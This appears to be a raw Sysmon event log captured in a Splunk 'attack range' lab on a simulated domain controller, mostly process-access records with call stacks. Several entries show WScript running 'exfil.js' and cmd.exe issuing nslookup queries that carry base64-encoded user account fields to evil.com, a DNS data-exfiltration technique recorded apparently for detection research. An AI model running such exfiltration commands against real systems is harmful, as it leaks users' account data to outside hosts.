14:21:27.555{2E1864BB-18E7-629A-0743-000000005F02}47685152C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-0643-000000005F02}4932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.539{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0743-000000005F02}4768C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.539{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.539{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.539{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.539{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.539{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0643-000000005F02}4932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.539{2E1864BB-18E0-629A-6742-000000005F02}39767732C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-0643-000000005F02}4932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.543{2E1864BB-18E7-629A-0643-000000005F02}4932C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqyqp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.524{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nloafdckx.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.508{2E1864BB-18E7-629A-0443-000000005F02}26925748C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-0543-000000005F02}4344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000207421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.508{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C325E7AB3A669083377ABE72BA3696B8,SHA256=BD3164187E8E0AC74F00014C34C65DE77ECBA13F9A335B5843108BC85EE5CF00,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.508{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.508{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.508{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.508{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.508{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0543-000000005F02}4344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.508{2E1864BB-18E7-629A-0343-000000005F02}49042556C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-0543-000000005F02}4344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.511{2E1864BB-18E7-629A-0543-000000005F02}4344C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-0343-000000005F02}4904C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloafdckx.tmp 2>&1 10341000x8000000000000000207413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.492{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-0443-000000005F02}2692C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.492{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-0443-000000005F02}2692C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.477{2E1864BB-18E7-629A-0443-000000005F02}26925748C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-0343-000000005F02}4904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.455{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0443-000000005F02}2692C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.455{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.455{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.455{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.455{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.455{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0343-000000005F02}4904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.455{2E1864BB-18E0-629A-6742-000000005F02}39764004C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-0343-000000005F02}4904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.459{2E1864BB-18E7-629A-0343-000000005F02}4904C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloafdckx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.455{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlakeu.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.424{2E1864BB-18E7-629A-0143-000000005F02}73647788C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-0243-000000005F02}3568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 